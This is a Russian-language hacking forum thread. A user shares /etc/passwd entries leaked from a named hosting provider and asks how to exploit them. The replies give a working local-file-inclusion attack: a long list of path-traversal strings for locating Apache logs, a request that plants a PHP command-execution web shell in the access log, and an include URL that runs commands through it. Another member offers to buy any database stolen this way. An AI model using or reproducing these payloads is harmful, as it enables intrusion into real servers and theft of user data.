вот с хостера robo-host.ru
выводиться в таком виде пхп иньекция:
подскажит как воспользоваться и что даёт этот код:

dvdrec:x:32383:32384::/home/dvdrec:/bin/false dyakoff:x:32386:32387::/home/dyakoff:/usr/local/cpanel/bin/noshell

egtgame:x:32388:32389::/home/egtgame:/usr/local/cpanel/bin/jailshell elektrok:x:32391:32392::/home/elektrok:/usr/local/cpanel/bin/jailshell

elitmebe:x:32392:32393::/home/elitmebe:/usr/local/cpanel/bin/jailshell wapoorg:x:32393:32394::/home/wapoorg:/usr/local/cpanel/bin/noshell

что?
обьясни плз я непонимаю (

ищи файл acces_log & error_log

../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log


затем посылай серверу запрос:
GET <?system($_GET["cmd"]);?> HTTP/1.1

HOST: site.com

Затем через инклуд подключаешь найденный access_log, и выполняешь команды...
www.site.com/index.php?page=../../../../../../../../logs/access_log&cmd=id

правда мало шансов что проканает.... :))

Видео (http://slil.ru/24160845)
(с)homo-sapiens (http://forum.web-hack.ru/index.php?showuser=21721)

Вот еще советую прочитать:
вопрос по etc/passwd

n1†R0x (member.php?u=32036)
Посмотри там 1 пост там есть /etc/passwd.

ANTI-4URKA (member.php?u=40497)
Сломаешь стукни мне, возможно куплю бд.

']n1†R0x (member.php?u=32036)
Посмотри там 1 пост там есть /etc/passwd.


[ cash ]
В той теме задавался похожий вопрос, "что можно поиметь с etc/passwd". На мой взгляд, ettee достаточно развернуто ответил на него.

n1†R0x (member.php?u=32036)
возможно я наркоман но тут нету постов ettee...

']n1†R0x (member.php?u=32036)
возможно я наркоман но тут нету постов ettee...
[ cash ]
В пятом посте ссылочка на тему, я про нее (про тему) и говорил )))